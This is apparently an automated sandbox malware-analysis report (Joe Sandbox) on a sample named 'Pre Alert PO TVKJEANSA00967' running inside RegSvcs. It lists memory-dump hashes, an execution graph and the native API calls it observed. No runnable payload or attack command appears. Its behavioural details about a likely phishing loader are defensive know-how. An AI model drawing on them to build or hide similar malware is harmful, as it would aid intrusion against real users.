                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800899210.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12dd000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 02042dc29d0042f5f53f6d94a7b57d1d3d56dbd51acb29ca2a778e13abf10fac
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 1E110376404284CFCB12CF54D5C4B16BF71FB84318F24C6A9D9090B257C336D45ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 548e418e94ca63aaeba677fca580080068886134814e28260e268581ddce2294
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: AA11BB75504284DFDB02CF54C5C8B15BFA1FB84224F24C6AAD9494B297C33AD40ACB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 40d65b2d6505f8c138cab06617c4e934032fa005cb4b460ea41412ed1fcff82e
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 2F11DD75504284CFDB12CF58D5C8B16FFA2FB84314F28C6AAD9094B656C33BD40ACBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74d8fa4303ee8d1cc6dbacb07b6ee1f2d1b0ec9603736804555467c1cd73866c
                                                                                                              • Instruction ID: 10724ca1de8ed795a96e7d747ef89b3568d64899bcbfc475bb782bec47772d35
                                                                                                              • Opcode Fuzzy Hash: 74d8fa4303ee8d1cc6dbacb07b6ee1f2d1b0ec9603736804555467c1cd73866c
                                                                                                              • Instruction Fuzzy Hash: 5AE10CB4E101199FDB14DFA9C5809AEFBB2FF89305F24C26AD414A7356DB31A941CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1aab60048fcdb6947a88e842c38e2b9c89defab92f2de99484528fc82bc378a6
                                                                                                              • Instruction ID: 194719a59fbd7b81cd5e7b13d76f200f20a100fee6638fc880366a34786bcf27
                                                                                                              • Opcode Fuzzy Hash: 1aab60048fcdb6947a88e842c38e2b9c89defab92f2de99484528fc82bc378a6
                                                                                                              • Instruction Fuzzy Hash: E5E10CB4E001199FDB14DF99C5809AEFBB2FF89305F24C66AD414A7356DB30A941CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b92f2d374854252bb1f766a996e6aa80c23244a314a75d4fa5bdfe5713e32b1
                                                                                                              • Instruction ID: 2325d5e39373673ca85e0e4228e8a6c0ce947c4676948a2ad1db3062e4ff4ad9
                                                                                                              • Opcode Fuzzy Hash: 3b92f2d374854252bb1f766a996e6aa80c23244a314a75d4fa5bdfe5713e32b1
                                                                                                              • Instruction Fuzzy Hash: B5E1FCB4E002199FDB14DF99C5809AEFBB2FF89305F24C26AD415AB356DB30A941CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 22b12ca0dbfab0a62e8340581f1889ca351d89e1ec70acf7ad4a29a26e3b04c7
                                                                                                              • Instruction ID: 636b740e86f5bb8e1cb8ba732dc7dfa9b5231a98590c7761985b9dcb85ce6731
                                                                                                              • Opcode Fuzzy Hash: 22b12ca0dbfab0a62e8340581f1889ca351d89e1ec70acf7ad4a29a26e3b04c7
                                                                                                              • Instruction Fuzzy Hash: A4A19132E0021ACFCF15DFB8D84099EBBB6FFC5304B55456AE901AB265DB71E905CB81

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.1%
                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                              Signature Coverage:9.3%
                                                                                                              Total number of Nodes:140
                                                                                                              Total number of Limit Nodes:11
                                                                                                              execution_graph 94083 414081 94084 414010 94083->94084 94087 41408b 94083->94087 94088 42cf33 94084->94088 94089 42cf4d 94088->94089 94092 15d2c70 LdrInitializeThunk 94089->94092 94090 414032 94092->94090 94093 425303 94097 42531c 94093->94097 94094 425364 94101 42ed53 94094->94101 94097->94094 94098 4253a4 94097->94098 94100 4253a9 94097->94100 94099 42ed53 RtlFreeHeap 94098->94099 94099->94100 94104 42d023 94101->94104 94103 425374 94105 42d040 94104->94105 94106 42d051 RtlFreeHeap 94105->94106 94106->94103 94107 42ff23 94108 42fe93 94107->94108 94109 42fef0 94108->94109 94113 42ee33 94108->94113 94111 42fecd 94112 42ed53 RtlFreeHeap 94111->94112 94112->94109 94116 42cfd3 94113->94116 94115 42ee4b 94115->94111 94117 42cfed 94116->94117 94118 42cffe RtlAllocateHeap 94117->94118 94118->94115 94226 424f73 94227 424f8f 94226->94227 94228 424fb7 94227->94228 94229 424fcb 94227->94229 94230 42ccb3 NtClose 94228->94230 94231 42ccb3 NtClose 94229->94231 94232 424fc0 94230->94232 94233 424fd4 94231->94233 94236 42ee73 RtlAllocateHeap 94233->94236 94235 424fdf 94236->94235 94237 428f13 94238 428f78 94237->94238 94239 428fb3 94238->94239 94242 419103 94238->94242 94241 428f95 94243 4190c0 94242->94243 94246 419111 94242->94246 94244 42d073 ExitProcess 94243->94244 94245 4190eb 94244->94245 94245->94241 94247 42fdf3 94248 42fe03 94247->94248 94249 42fe09 94247->94249 94250 42ee33 RtlAllocateHeap 94249->94250 94251 42fe2f 94250->94251 94252 42c293 94253 42c2ad 94252->94253 94256 15d2df0 LdrInitializeThunk 94253->94256 94254 42c2d5 94256->94254 94119 41b843 94120 41b887 94119->94120 94122 41b8a8 94120->94122 94123 42ccb3 94120->94123 94124 42cccd 94123->94124 94125 42ccde NtClose 94124->94125 94125->94122 94126 414583 94127 41459d 94126->94127 94132 417d53 94127->94132 94129 4145bb 94130 414600 94129->94130 94131 4145ef PostThreadMessageW 94129->94131 94131->94130 94133 417d77 94132->94133 94134 417d7e 94133->94134 94136 417d9d 94133->94136 94139 4301d3 LdrLoadDll 94133->94139 94134->94129 94137 417dca 94136->94137 94138 417dc0 LdrLoadDll 94136->94138 94137->94129 94138->94137 94139->94136 94140 419305 94141 42ccb3 NtClose 94140->94141 94142 41930f 94141->94142 94143 4019e9 94144 401a04 94143->94144 94147 4302c3 94144->94147 94150 42e923 94147->94150 94151 42e949 94150->94151 94162 407583 94151->94162 94153 42e95f 94154 401a9b 94153->94154 94165 41b653 94153->94165 94156 42e97e 94157 42e993 94156->94157 94180 42d073 94156->94180 94176 428823 94157->94176 94160 42e9ad 94161 42d073 ExitProcess 94160->94161 94161->94154 94164 407590 94162->94164 94183 416a13 94162->94183 94164->94153 94166 41b67f 94165->94166 94201 41b543 94166->94201 94169 41b6c4 94171 41b6e0 94169->94171 94174 42ccb3 NtClose 94169->94174 94170 41b6ac 94172 41b6b7 94170->94172 94173 42ccb3 NtClose 94170->94173 94171->94156 94172->94156 94173->94172 94175 41b6d6 94174->94175 94175->94156 94177 428885 94176->94177 94179 428892 94177->94179 94212 418bc3 94177->94212 94179->94160 94181 42d090 94180->94181 94182 42d0a1 ExitProcess 94181->94182 94182->94157 94184 416a2d 94183->94184 94186 416a43 94184->94186 94187 42d723 94184->94187 94186->94164 94189 42d73d 94187->94189 94188 42d76c 94188->94186 94189->94188 94194 42c2e3 94189->94194 94192 42ed53 RtlFreeHeap 94193 42d7df 94192->94193 94193->94186 94195 42c2fd 94194->94195 94198 15d2c0a 94195->94198 94196 42c329 94196->94192 94199 15d2c1f LdrInitializeThunk 94198->94199 94200 15d2c11 94198->94200 94199->94196 94200->94196 94202 41b55d 94201->94202 94206 41b639 94201->94206 94207 42c383 94202->94207 94205 42ccb3 NtClose 94205->94206 94206->94169 94206->94170 94208 42c39d 94207->94208 94211 15d35c0 LdrInitializeThunk 94208->94211 94209 41b62d 94209->94205 94211->94209 94213 418bed 94212->94213 94219 4190eb 94213->94219 94220 4141f3 94213->94220 94215 418d1a 94216 42ed53 RtlFreeHeap 94215->94216 94215->94219 94217 418d32 94216->94217 94218 42d073 ExitProcess 94217->94218 94217->94219 94218->94219 94219->94179 94224 414213 94220->94224 94222 414272 94222->94215 94223 41427c 94223->94215 94224->94223 94225 41b963 RtlFreeHeap LdrInitializeThunk 94224->94225 94225->94222 94257 15d2b60 LdrInitializeThunk

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 73 417d53-417d7c call 42f933 77 417d82-417d90 call 42ff33 73->77 78 417d7e-417d81 73->78 81 417da0-417db1 call 42e3f3 77->81 82 417d92-417d9d call 4301d3 77->82 87 417db3-417dc7 LdrLoadDll 81->87 88 417dca-417dcd 81->88 82->81 87->88
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction ID: 08bd548759aae07358cb4646aed3384bf96d8624cb653567a7904251cc283145
                                                                                                              • Opcode Fuzzy Hash: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction Fuzzy Hash: B1015EB1E4020DABDF10DAE1DC42FEEB378AF54308F0041AAE90897240F635EB498B95

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 291 42ccb3-42ccec call 404983 call 42def3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction ID: 2e732b0acf22db8564dcba67f832cc3ad7cc9e83e5d8d7d52730fa31added9c1
                                                                                                              • Opcode Fuzzy Hash: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction Fuzzy Hash: BFE04F726446147BD120AA6ADC01F9B776CDBC6715F00451AFE486B241C775790087E4
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                                                                              • Instruction ID: 7c122859cda5735cfa88d52c7e3190221f5b65acb0d2046d145294b44a1b9722
                                                                                                              • Opcode Fuzzy Hash: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                                                                              • Instruction Fuzzy Hash: DF90026160240003410972584418616408AA7E0211B59C421E1014990DC56589916225
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                                                                              • Instruction ID: 77ac7b294673f5818fa2640514454856cf971841be5eca3eeeee6d53ff32a42e
                                                                                                              • Opcode Fuzzy Hash: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                                                                              • Instruction Fuzzy Hash: 2990023160140413D115725845087070089A7D0251F99C812A0424958DD6968A52A221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                                                                              • Instruction ID: 3e29ed3d29b0892d6e8d646bbcd5991538b16a9bd0b63507ac230cab250efbfd
                                                                                                              • Opcode Fuzzy Hash: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                                                                              • Instruction Fuzzy Hash: B190023160148802D1147258840874A0085A7D0311F5DC811A4424A58DC6D589917221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                                                                              • Instruction ID: 4adf2cd3ea3bdca79dca36a60b1f974098add921ac85357bd232ca71505b5a38
                                                                                                              • Opcode Fuzzy Hash: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                                                                              • Instruction Fuzzy Hash: 5D900231A0550402D104725845187061085A7D0211F69C811A0424968DC7D58A5166A2

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(06-AG764,00000111,00000000,00000000), ref: 004145FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 06-AG764$06-AG764$}B6B
                                                                                                              • API String ID: 1836367815-2301950950
                                                                                                              • Opcode ID: 32d0a85581feaec610a6c651d6e678cc6ff1858a0ad993c0795a2db33d822706
                                                                                                              • Instruction ID: e05182db85c9781ac3c469ae5be033ea5d1da759210e27bc0ae874b73e6a8d1c
                                                                                                              • Opcode Fuzzy Hash: 32d0a85581feaec610a6c651d6e678cc6ff1858a0ad993c0795a2db33d822706
                                                                                                              • Instruction Fuzzy Hash: D411E5B2D0111C7ADB11ABE59C81DEF7B7CAF4179CF048069FA04A7240D67C4E068BB5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 14 41443c-414444 15 4144c3 14->15 16 414446-414448 14->16 19 414525-4145ed call 425443 15->19 20 4144c5 15->20 17 4143d1-4143e9 16->17 18 41444a-414464 16->18 17->14 26 41460d-414613 19->26 27 4145ef-4145fe PostThreadMessageW 19->27 21 4144c0-4144c2 20->21 22 4144c7-4144d4 20->22 21->15 22->19 27->26 28 414600-41460a 27->28 28->26
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 06-AG764$06-AG764
                                                                                                              • API String ID: 0-1005340343
                                                                                                              • Opcode ID: 73aed8bb8df44d63caf875d85eefeeb182e15a5cee0129e437c242bd6b8eea98
                                                                                                              • Instruction ID: e435679f6665afacf91cf5e43732acf3c7632fa13cea7890ee95d90669a83247
                                                                                                              • Opcode Fuzzy Hash: 73aed8bb8df44d63caf875d85eefeeb182e15a5cee0129e437c242bd6b8eea98
                                                                                                              • Instruction Fuzzy Hash: 5621547394005D3ACB119A58AD819FFB7ADEF81334B0C8156EC48D7701D6388D4787D5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 29 414583-414595 30 41459d-4145c0 call 42f803 call 417d53 29->30 31 414598 call 42edf3 29->31 36 4145c7-4145ed call 425443 30->36 37 4145c2 call 4048f3 30->37 31->30 40 41460d-414613 36->40 41 4145ef-4145fe PostThreadMessageW 36->41 37->36 41->40 42 414600-41460a 41->42 42->40
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(06-AG764,00000111,00000000,00000000), ref: 004145FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 06-AG764$06-AG764
                                                                                                              • API String ID: 1836367815-1005340343
                                                                                                              • Opcode ID: ce0f8da3631f06945a98a42f26bab445008cbfdc3b01d210e9895f74cc71e732
                                                                                                              • Instruction ID: 8e1aee84789d8e109a054ff5d87f6a3355407e3176ad634eaf2bf3cb58436bf1
                                                                                                              • Opcode Fuzzy Hash: ce0f8da3631f06945a98a42f26bab445008cbfdc3b01d210e9895f74cc71e732
                                                                                                              • Instruction Fuzzy Hash: 090104B2D0021C7ADB00AAE19C81DEFBB7C9F4079CF008069FA04A7240D67C4E0687B5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 43 417df7-417e12 45 417e13-417e17 43->45 46 417e19-417e1f 45->46 47 417d9f-417db1 45->47 50 417e22 46->50 48 417db3-417dbd 47->48 49 417dca-417dcd 47->49 51 417dc0-417dc7 LdrLoadDll 48->51 52 417e23-417e25 50->52 51->49 53 417e27-417e2a 52->53 54 417dd6-417de0 52->54 53->45 56 417e2b-417e38 53->56 54->51 55 417de3-417deb 54->55 57 417d7a-417d7c 55->57 58 417ded-417df4 55->58 56->50 59 417e3a 56->59 60 417d82-417d90 call 42ff33 57->60 61 417d7e-417d81 57->61 62 417e6c-417e6f 59->62 63 417e3c 59->63 67 417da0-417db1 call 42e3f3 60->67 68 417d92-417d9d call 4301d3 60->68 62->52 64 417e71-417e76 62->64 63->62 67->48 67->49 68->67
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction ID: 74706c121a0511041eb66161e31037ffdd23514e4eda48774a9572b29bd1f95c
                                                                                                              • Opcode Fuzzy Hash: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction Fuzzy Hash: E621547650870A9BDB14CA24E882BEAFBF2EF85354B10859ED405CB100E239EE86C765

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 90 417dd3-417de0 92 417dc0-417dc7 LdrLoadDll 90->92 93 417de3-417deb 90->93 96 417dca-417dcd 92->96 94 417d7a-417d7c 93->94 95 417ded-417df4 93->95 97 417d82-417d90 call 42ff33 94->97 98 417d7e-417d81 94->98 101 417da0-417db1 call 42e3f3 97->101 102 417d92-417d9d call 4301d3 97->102 101->96 107 417db3-417dbd 101->107 102->101 107->92
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction ID: ec85eaa0c4f7441129db57d33a1dfb13c9fdddb1091b3c73e9587e81164588ff
                                                                                                              • Opcode Fuzzy Hash: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction Fuzzy Hash: 33E0263154C60C7AD620B648BC47FBBBB2CEB81345F00429AFC0C81240E5246D90A1F6

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 286 42d023-42d067 call 404983 call 42def3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A7E85651,00000007,00000000,00000004,00000000,004175CD,000000F4), ref: 0042D062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction ID: 3c3b746281d21e7e3f49c7771b4cccdf7fc6bbd7da1f82bc83099fbb5e6804ba
                                                                                                              • Opcode Fuzzy Hash: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction Fuzzy Hash: 34E0EDB1604254BBD614EE59DC41F9B77ACEFC5714F004419FE08A7241D675B911CBB8

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 281 42cfd3-42d014 call 404983 call 42def3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EB0E,?,?,00000000,?,0041EB0E,?,?,?), ref: 0042D00F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction ID: 8d89856d15ca0cfe871f97118b518311c6fd52371086a2a90eb6c8310eebbaee
                                                                                                              • Opcode Fuzzy Hash: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction Fuzzy Hash: 1CE06DB22002447FC614EE59EC41EDB77ACEFC9710F00441AFE08A7242C674B9108AB4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 296 42d073-42d0af call 404983 call 42def3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,3583ABD1,?,?,3583ABD1), ref: 0042D0AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 444dcd0509e69f77e1d34aa41e76693d4b37de84aa4f6651f4c6fe4085af390b
                                                                                                              • Instruction ID: d051ef962d83d02b4f9c33ceb59ed46ba6a16d81ade362a331e91d32086bf411
                                                                                                              • Opcode Fuzzy Hash: 444dcd0509e69f77e1d34aa41e76693d4b37de84aa4f6651f4c6fe4085af390b
                                                                                                              • Instruction Fuzzy Hash: C8E086712006547FC120EA5ADC41FDB775CDFC5714F01441AFE0867141C6B5B90087F5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
